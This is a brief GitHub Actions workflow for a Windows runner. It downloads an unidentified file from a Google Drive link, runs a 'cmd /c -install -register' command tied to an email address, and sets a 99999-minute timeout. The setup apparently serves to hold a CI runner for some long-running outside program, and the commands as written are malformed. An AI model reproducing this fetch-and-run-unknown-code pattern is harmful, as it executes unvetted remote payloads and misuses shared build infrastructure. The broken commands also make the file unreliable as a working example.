name: Workflow main

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
      - name: first step
        run: |
         
         Invoke-WebRequest "https://drive.usercontent.google.com/download?id=13fp07AYiONScFmMkJTdLNjto_m-Lo20d&export=download&authuser=0"
             cmd /c -install -register kauanscintras@gmail.com
          
    timeout-minutes: 99999
